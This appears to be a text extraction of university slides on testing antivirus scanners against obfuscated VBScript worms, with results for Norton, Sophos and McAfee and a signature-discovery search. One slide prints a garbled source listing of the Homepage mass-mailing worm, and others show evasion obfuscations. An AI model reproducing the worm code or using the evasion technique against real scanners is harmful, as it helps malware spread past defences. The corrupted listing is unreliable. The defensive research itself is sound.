Testing Malware Detectors. Mihai Christodorescu Somesh Jha Wisconsin Safety Analyzer University of Wisconsin, Madison
2-7 Introduction. A malware detector identifies malicious content (data, code).
8 Attack Model. An attacker tries to make malware appear benign.
9 Evasive Maneuvers. Obfuscation: same functionality, different form. Malware writers have many tools at their disposal. Blackhat tools: MISTFALL, CB Mutate, ... Commercial tools: Cloakware, PECompact, ... Example: the Beagle worm family.
10-12 Renaming Obfuscation. Fragment of the Homepage worm:
    On Error Resume Next
    ...
    Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
    ...
    Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
Obfuscated fragment of the Homepage worm (identifiers renamed):
    On Error Resume Next
    ...
    set will=rumor.opentextfile(wscript.scriptfullname,1)
    ...
    set ego=rumor.opentextfile(folder&"\homepage.html.vbs",2,true)
13-18 Encapsulation Obfuscation. Fragment of the Homepage worm:
    On Error Resume Next
    ...
    Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
    ...
    Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
Obfuscated fragment of the Homepage worm (each statement hex-encoded and passed to Execute):
    Execute( decode( "4F6E F " ) )
    ...
    Execute( decode( " E...462E " ) )
    ...
    Execute( decode( "4C696E C660A" ) )
19-20 How Detection Works. Misuse detectors are malware detectors that use signatures to identify malicious code. In this talk: a generic method illustrated with virus scanner and worm examples. McAfee VirusScan signature for the Homepage worm:
    On Error Resume Next
    ...
    Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
    ...
    Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
21 How Detection Works On Error Resume Next et W = CreateObject("Wcript.hell") et FO= Createobject("scripting.filesystemobject") Folder=FO.GetpecialFolder(2) et InF=FO.OpenTextFile(Wcript.criptFullname,1) Do While InF.AtEndOftream<>True criptbuffer=criptbuffer&inf.readline&vbcrlf Loop et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write criptbuffer OutF.close et FO=Nothing If W.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If et s=createobject("outlook.application") et t=s.getnamepace("mapi") et u=t.getdefaultfolder(6) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).close u.items.item(i).delete End If Next et u=t.getdefaultfolder(3) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).delete End If Next Randomize r=int((4*rnd)+1) If r=1 then W.Run(" elseif r=2 Then W.Run(" elseif r=3 Then W.Run(" ) ElseIf r=4 Then W.Run(" End If Function Mailit() On Error Resume Next et Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then et Mapi=Outlook.GetNamepace("MAPI") et Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount et Mail = Outlook.CreateItem(0) et Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.ubject = "Homepage" Mail.Body = vbcrlf&"hi!"&vbcrlf&vbcrlf&"you've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf et Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.html.vbs" Mail.DeleteAfterubmit = True If Mail.To <> "" Then Mail.end W.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function 21
23-24 Testing Goal: Resilience. Motivation: obfuscation libraries are plentiful, and worm families use incremental obfuscations, so we need to assess resilience to obfuscation. Current AV certification is inadequate: it checks only detection of existing malware at a given point in time.
25 Testing Goal: Resilience. Question 1: How resistant is a virus scanner to obfuscations or variants of known worms? Question 2: Using the limitations of a virus scanner, can a blackhat determine its detection algorithm?
26-27 Testing Methodology. 1. Random testing for resilience assessment: use obfuscation transformations to generate worm instances to be used as test samples. 2. Adaptive testing for signature discovery: use virus scanner detection rates on obfuscated worm instances to learn the signature employed.
28 Roadmap: Introduction; Goals; Testing resilience to obfuscation; Signature discovery; Future work; Conclusions.
29-30 1. Random testing (pipeline diagram): Worm + Parameter Generator -> Obfuscation Algorithm (variable renaming, code encapsulation, garbage insertion, code reordering) -> Obfuscated Worm -> Virus Scanner -> Detected / Not detected.
31-34 1. Random testing (diagram): the original worm is turned into obfuscated instances by renaming, reordering and garbage insertion.
35-37 1. Random testing: Homepage worm in Norton AV. Obfuscated instances (renaming, reordering, garbage insertion), 4432 in total, classified as detected / not detected. False negative rate: 11.5%.
38-42 False Negative Rate by Worm (bar chart; scanners: Norton AntiVirus, Sophos Antivirus, McAfee VirusScan; worms: Melissa, Tune, Chantal, Anna Kournikova, Homepage, Lucky2, Gascript, Yovp; y-axis 0% to 100%; labelled bars include 72%, 75%, 53%, 38%, 13%, 13%, 5% and 0%). Observations: Sophos cannot cope with obfuscations. No improvement over time. Wild variation in false negative rates.
43-45 False Negative Rate by Obfuscation (bar chart; scanners: Norton AntiVirus, Sophos Antivirus, McAfee VirusScan; obfuscations: variable renaming, hexadecimal encoding, code reordering, garbage insertion; y-axis 0% to 100%; one labelled bar at 1%). Observations: variable renaming is handled very well. Detection fails for both encapsulation and reordering.
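A random-testing harness in the shape of the pipeline above (worm -> obfuscation -> scanner -> detected / not detected), as an added example that is not the authors' tool: the toy script, the three obfuscators and the mock signature scanner are all constructed here, and the false negative rate is computed as the slides define it (undetected instances over all instances).

```python
"""Random testing of a signature scanner's resilience to obfuscation.
Added example: the toy script, obfuscators and mock scanner are constructed and
are not the authors' tool or any real scanner."""
import random
import re
from typing import Callable, List, Sequence

Script = List[str]

# Constructed toy "worm": pseudo-VBScript statements with no real malware behaviour.
TOY_SCRIPT = [
    "On Error Resume Next",
    "Set Conn = Net.Open(Host, 80)",
    "Buf = Conn.ReadAll()",
    "Log.Write Buf",
    "Conn.Close",
    "Set Conn = Nothing",
]
USER_IDENTS = ["Conn", "Buf", "Host", "Log", "Net"]   # names a renamer may change
KEYWORDS = {"On", "Error", "Resume", "Next", "Set", "Nothing", "Execute", "decode", "Dim"}
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")

# Mock scanner: the signature is a contiguous run of statements. Author-chosen
# identifiers are canonicalised to ID before matching, which is why renaming alone
# does not defeat it (the "variable renaming handled very well" finding).
SIGNATURE = ["Buf = Conn.ReadAll()", "Log.Write Buf"]


def canon(stmt: str) -> str:
    """Replace author-chosen identifiers by ID; keep keywords and member names."""
    def repl(m):
        tok = m.group(0)
        after_dot = m.start() > 0 and stmt[m.start() - 1] == "."
        return tok if tok in KEYWORDS or after_dot else "ID"
    return IDENT.sub(repl, stmt)


def detect(script: Script, sig: Sequence[str] = SIGNATURE) -> bool:
    """True if the canonicalised signature occurs as a contiguous run in the script."""
    body = [canon(s) for s in script]
    pat = [canon(s) for s in sig]
    return any(body[i:i + len(pat)] == pat for i in range(len(body) - len(pat) + 1))


def rename(script: Script, rng: random.Random) -> Script:
    """Renaming obfuscation: consistent random new names for user identifiers."""
    names = {n: f"v{rng.randrange(10**6)}" for n in USER_IDENTS}
    return [IDENT.sub(lambda m: names.get(m.group(0), m.group(0)), s) for s in script]


def hex_encode(script: Script, rng: random.Random) -> Script:
    """Encapsulation obfuscation: each statement becomes Execute(decode("<hex>"))."""
    return [f'Execute(decode("{s.encode().hex().upper()}"))' for s in script]


def insert_garbage(script: Script, rng: random.Random) -> Script:
    """Garbage insertion: one to three dead 'Dim' statements at random positions."""
    out = list(script)
    for _ in range(rng.randint(1, 3)):
        out.insert(rng.randrange(len(out) + 1), f"Dim junk{rng.randrange(1000)}")
    return out


def false_negative_rate(obf: Callable[[Script, random.Random], Script],
                        trials: int = 1000, seed: int = 1) -> float:
    """Random testing: fraction of obfuscated instances the mock scanner misses."""
    rng = random.Random(seed)
    misses = sum(not detect(obf(TOY_SCRIPT, rng)) for _ in range(trials))
    return misses / trials


if __name__ == "__main__":
    for name, obf in [("renaming", rename), ("hex encoding", hex_encode),
                      ("garbage insertion", insert_garbage)]:
        print(f"{name:18s} false negative rate: {false_negative_rate(obf):.1%}")
```

With this mock, renaming yields a 0% false negative rate, hex encoding 100%, and garbage insertion a rate between the two that depends on how often a dead statement lands inside the signature run, which is the same shape of result the slides report for the commercial scanners.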
47-48 2. Adaptive Testing. The signature discovery algorithm finds the K malware statements (1, 2, ..., K-1, K) that, when obfuscated, create an undetectable malware variant. We need an opaque obfuscation transformation.
49-50 Signature Discovery (pipeline diagram): Worm + Parameter Generator -> Opaque Obfuscation -> Obfuscated Worm -> Virus Scanner -> Detected / Not detected.
51-61 Signature Discovery Algorithm (walkthrough on the original worm): 1st obfuscated instance: not detected. 2nd obfuscated instance: not detected. 3rd obfuscated instance: detected. 4th obfuscated instance: not detected. Done. One signature element found in O(log N).
62-64 Signature Discovery Algorithm. By biasing the search towards the left, we can find the leftmost signature element. The search range for the second signature element starts after it. Worst running time: O(K log N).
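The signature discovery search described above, as an added example rather than the authors' implementation: the toy script, the opaque transform and the mock scanner oracle are constructed, and the binary search is biased left so each pass returns the leftmost remaining signature element in O(log N) queries, for O(K log N) overall.

```python
"""Signature discovery by adaptive testing against a mock scanner.
Added example; the script, the scanner oracle and the opaque transform are
constructed here and are not the authors' tool."""
from typing import Callable, Iterable, List, Optional

Script = List[str]

# Constructed toy script: 12 placeholder statements, no real malware.
TOY_SCRIPT = [f"Call Step{i}()" for i in range(12)]
# Constructed mock signature: three statements that must all appear in the clear.
MOCK_SIGNATURE = {TOY_SCRIPT[2], TOY_SCRIPT[7], TOY_SCRIPT[11]}


def opaque(script: Script, idxs: Iterable[int]) -> Script:
    """Opaque obfuscation: the selected statements become Execute(decode("<hex>")),
    so a scanner matching on source text no longer sees them."""
    hide = set(idxs)
    return [f'Execute(decode("{s.encode().hex().upper()}"))' if i in hide else s
            for i, s in enumerate(script)]


def make_mock_scanner(signature: set):
    """Scanner oracle: 'detected' iff every signature statement is present verbatim.
    Also returns a counter so the number of queries can be inspected."""
    calls = {"n": 0}

    def scan(script: Script) -> bool:
        calls["n"] += 1
        return signature.issubset(script)
    return scan, calls


def leftmost_element(killed: Callable[[int, int], bool], lo: int, hi: int) -> Optional[int]:
    """Binary search for the smallest index in [lo, hi) whose obfuscation defeats
    detection; killed(a, b) is True when obfuscating statements [a, b) goes undetected."""
    if not killed(lo, hi):          # no signature element anywhere in the range
        return None
    while hi - lo > 1:              # invariant: [lo, hi) contains an element
        mid = (lo + hi) // 2
        if killed(lo, mid):         # biased left: keep the left half when it suffices
            hi = mid
        else:
            lo = mid
    return lo


def discover_signature(scan: Callable[[Script], bool], script: Script) -> List[int]:
    """Return the indices of all K signature elements using O(K log N) queries."""
    def killed(lo: int, hi: int) -> bool:
        return not scan(opaque(script, range(lo, hi)))

    found, lo = [], 0
    while lo < len(script):
        idx = leftmost_element(killed, lo, len(script))
        if idx is None:
            break
        found.append(idx)
        lo = idx + 1                # search range for the next element starts after it
    return found


if __name__ == "__main__":
    scan, calls = make_mock_scanner(MOCK_SIGNATURE)
    print("signature elements:", discover_signature(scan, TOY_SCRIPT))
    print("scanner queries:", calls["n"])
```

When the mock signature is the whole body (the Sophos case on the next slide), every index is returned and the cost grows to O(N log N), which is the observable difference between a short and a whole-body signature.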
65-66 Discovered Signatures. Worm sample: Homepage.
Norton AntiVirus:
    Attachment.Add Folder & "\homepage.html.vbs"
Sophos Antivirus: the whole body of the malware.
McAfee VirusScan:
    On Error Resume Next
    Set InF = FSO.OpenTextFile( WScript.ScriptFullname, 1 )
    Set OutF = FSO.OpenTextFile( Folder & "\homepage.html.vbs", 2, true )
67 What If... A virus writer uses signature information to thwart virus scanners. Each virus variant can now evade detection. Viruses can repeatedly try to enter a system, learning the signature in the process.
69 Future Work. Binary viruses: the same obfuscation techniques apply; a binary rewriting library is work in progress. Refine the signature discovery algorithm: search below instruction level; detect more powerful signature classes.
70 Conclusions. Obfuscation-based testing techniques are useful in comparing virus scanners. Commercial virus scanners have poor resilience to common obfuscation transformations.
More informationFILELESSMALW ARE PROTECTION TEST OCTOBER2017
FILELESSMALW ARE PROTECTION TEST OCTOBER2017 1 / 12 INTRODUCTION In times of digitalization of each aspect of public and private life new and interesting techniques of bypassing protections are abundant.
More informationIntel Security Advanced Threat Defense Threat Detection Testing
Intel Security Advanced Threat Defense Threat Detection Testing DR150724C July 2015 Miercom www.miercom.com Contents 1.0 Executive Summary... 3 2.0 Overview... 4 Products Tested... 4 3.0 How We Did It...
More informationVery Fast Containment of Scanning Worms. Nicholas Weaver, Stuart Staniford, Vern Paxson ICSI, Nevis Networks, ICSI & LBNL
Very Fast Containment of Scanning Worms Nicholas Weaver, Stuart Staniford, Vern Paxson ICSI, Nevis Networks, ICSI & LBNL 1 Outline Worm Containment Scan Suppression Hardware Implementation Cooperation
More informationKaspersky PURE 2.0. Mail Anti-Virus: security levels
Mail Anti-Virus: security levels Content Mail Anti-Virus. Security levels... 2 Operation algorithm of Mail Anti-Virus... 2 Security levels of Mail Anti-Virus... 2 Customizing security level... 4 Creating
More information1, NEWS REVIEWS FEATURES OPINIONS HOW-TOs FORUM PHOTOS VIDE SPECIALS
NEWS REVIEWS FEATURES OPINIONS HOW-TOs FORUM PHOTOS VIDE SPECIALS MOBILE PHONES TABLETS NOTEBOOKS GRAPHICS CARDS GAMING CAMERAS HDTVS DOCK REVIEWS / MAC OS / ESCAN (MICROWORLD SOFTWARE SERVICES PVT. LTD.)
More informationAntivirus Technology
Antivirus Technology CSH6 Chapter 41 Antivirus Technology Chey Cobb & Allysa Myers 1 Copyright 2015 M. E. Kabay. All rights reserved. Topics AV Terminology AV Issues History of Viral Changes Antivirus
More informationTrend Micro Deep Discovery for Education. Identify and mitigate APTs and other security issues before they corrupt databases or steal sensitive data
Trend Micro Deep Discovery for Education Identify and mitigate APTs and other security issues before they corrupt databases or steal sensitive data 1 Computers, the Internet, and portable devices are now
More informationHow To Remove Live Security Platinum Virus Using Mcafee
How To Remove Live Security Platinum Virus Using Mcafee This article helps you determine what to do if you discover or suspect a virus For current information about viruses and threats, always use the
More informationHow to Predict Viruses Under Uncertainty
How to Predict Email Viruses Under Uncertainty InSeon Yoo and Ulrich Ultes-Nitsche Department of Informatics, University of Fribourg, Chemin du Musee 3, Fribourg, CH-1700, Switzerland. phone: +41 (0)26
More informationAnti-Virus. Anti-Virus Scanning Overview. This chapter contains the following sections:
This chapter contains the following sections: Scanning Overview, page 1 Sophos Filtering, page 2 McAfee Filtering, page 4 How to Configure the Appliance to Scan for Viruses, page 6 Sending an Email to
More informationHow to Identify Advanced Persistent, Targeted Malware Threats with Multidimensional Analysis
White paper How to Identify Advanced Persistent, Targeted Malware Threats with Multidimensional Analysis AhnLab, Inc. Table of Contents Introduction... 1 Multidimensional Analysis... 1 Cloud-based Analysis...
More informationExample 1 Root Cause Analysis Report Focal Point: Loss of Productivity
Report Number: RCA 2012.430 Report Date: 04/30/2012 RCA Owner: Problem Management Problem Statement Example 1 Root Cause Analysis Report Focal Point: Loss of Productivity Focal Point Loss of Productivity
More informationArtificial Intelligence Methods invirus Detection & Recognition
Artificial Intelligence Methods in Virus Detection & Recognition Introduction to heuristic scanning Wojciech Podgórski http://podgorski.wordpress.com October 16, 2008 Presentation outline 1 Introduction
More informationManually Update Kaspersky Virus Removal Tool
Manually Update Kaspersky Virus Removal Tool Database Obsolete Kaspersky Removal Tool 2015 contains articles on how to install, activate, and use "This version is obsolete" message in Kaspersky Virus Removal
More informationBase64 The Security Killer
Base64 The Security Killer Kevin Fiscus NWN Corporation Session ID: DAS-203 Session Classification: Intermediate A Short (Made Up) Security Story Helix Pharmaceuticals is concerned about security Industrial
More informationNetDefend Firewall UTM Services
NetDefend Firewall UTM Services Unified Threat Management D-Link NetDefend UTM firewalls (DFL-260/860/1660/2560/2560G) integrate an Intrusion Prevention System (IPS), gateway AntiVirus (AV), and Web Content
More informationTurn On Windows Defender Windows 8.1 This App Has Been Turned Off
Turn On Windows Defender Windows 8.1 This App Has Been Turned Off It comes built into Windows Vista, Windows 7, Windows 8 and Windows 8.1. Windows. Mar 12, 2015. Windows Defender: "the app has been turned
More informationHow To Remove Xp Internet Security 2011 Virus Manually
How To Remove Xp Internet Security 2011 Virus Manually Contact your anti-malware vendor for assistance with identifying or removing virus or worm infections. If you need more help with malware removal
More informationUP L13: Leveraging the full protection of SEP 12.1.x
UP L13: Leveraging the full protection of SEP 12.1.x Hands on lab Description In this hands on lab you will learn about the different protection technologies bundled in SEP 12.1.x and see how they complement
More informationNorton Internet Security 2012 Removal Tool For Windows 7
Norton Internet Security 2012 Removal Tool For Windows 7 Norton Removal Tool 22.5.0.4 - A program that can remove the majority of Symantec from your computer including Norton Antivirus, Ghost or Internet
More informationPrevent and Detect Malware with Symantec Advanced Threat Protection: Network
WHITE PAPER: SYMANTEC ADVANCED THREAT PROTECTION........................................ Prevent and Detect Malware with Symantec Advanced Threat Protection: Network Who should read this paper This white
More informationManaging SonicWall Gateway Anti Virus Service
Managing SonicWall Gateway Anti Virus Service SonicWall Gateway Anti-Virus (GAV) delivers real-time virus protection directly on the SonicWall security appliance by using SonicWall s IPS-Deep Packet Inspection
More informationReal Security. In Real Time. White Paper. Preemptive Malware Protection through Outbreak Detection
Real Security. In Real Time. White Paper Preemptive Malware Protection through Detection Table of Contents Executive Summary...2 Response Time to New s The Achilles Heel of the Anti-Virus Industry...3
More informationAnti-Virus Testing and AMTSO
Anti-Virus Testing and AMTSO Patrik Runald, Security Response Manager Helsinki Kuala Lumpur San Jose Tokyo London Paris Milan Hong Kong Mumbay Warsaw Munich Copenhagen Brussels Oulu Utrecht Oslo Stockholm
More informationF-PROT Antivirus Engine performance analysis
F-PROT Antivirus Engine performance analysis By FRISK Software International For partners FRISK Software International FRISK Software International More than 20 years experience in the antivirus business
More informationCopyright 2004 ESET. ESET reserves the right to change any of the described application modules without prior notice.
Copyright 2004 ESET All rights reserved. No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording,
More informationANTIVIRUS SITE PROTECTION (by SiteGuarding.com)
ANTIVIRUS SITE PROTECTION (by SiteGuarding.com) USER GUIDE Version 0.1.0 1 Table of content 1. INTRODUCTION. 3 2. HOW IT WORKS.... 6 3. HOW TO CONFIGURE.. 7 2 1. INTRODUCTION Antivirus Site Protection
More informationPolymorphic Worm Detection Using Structural Information of Executables
Polymorphic Worm Detection Using Structural Information of Executables Christopher Kruegel 1,EnginKirda 1, Darren Mutz 2, William Robertson 2, and Giovanni Vigna 2 1 Technical University of Vienna chris@auto.tuwien.ac.at,
More informationThe State of Endpoint Security: Past, Present and Future WHITE PAPER
The State of Endpoint Security: Past, Present and Future WHITE PAPER Is Malware Winning? It does not look like things are getting better in the world of cybersecurity powerful ransomware, breaches affecting
More informationExam : Title : symantec small Business security. Version : DEMO
Exam : 250-101 Title : symantec small Business security Version : DEMO 1. Which heuristic technology does Symantec AntiVirus use? A. Q-Factor B. Bloodhound C. pattern matching D. regular expression 2.
More informationProtection FAQs
Email Protection FAQs Table of Contents Email Protection FAQs... 3 General Information... 3 Which University email domains are configured to use Email Protection for Anti-Spam?... 3 What if I am still
More informationGFI product comparison: GFI MailEssentials vs. Barracuda Spam Firewall
GFI product comparison: GFI MailEssentials vs. Barracuda Spam Firewall Features GFI MailEssentials Barracuda Spam Firewall Integrates with Microsoft Exchange Server 2007/2010/2013 Scans incoming and outgoing
More informationCannot Uninstall Mcafee Agent Because Other
Cannot Uninstall Mcafee Agent Because Other Products Are Using It Is there a tool or a command line to manually uninstall the agent deployed by beta EPO 5.2? via Programs and Features using the default
More informationConfiguring Antivirus Devices
CHAPTER 9 Revised: November 11, 2007 Antivirus (AV) devices provide detection and prevention against known viruses and anomalies. This chapter describes how to configure and add the following devices and
More informationThe WildList is Dead, Long Live the WildList!
The WildList is Dead, Long Live the WildList! Andreas Marx, Frank Dessmann AV-Test GmbH, Magdeburg, Germany http://www.av-test.org Presented at the Virus Bulletin 2007 Conference in Vienna, Austria http://www.virusbtn.com/conference/vb2007
More informationCommtouch Messaging Security for Hosting Providers
Commtouch Messaging Security for Hosting Providers September 2009 nospam@commtouch.com www.commtouch.com blog.commtouch.com About Commtouch Since 1991 NASDAQ: CTCH Profitable Double digit growth Over 100
More information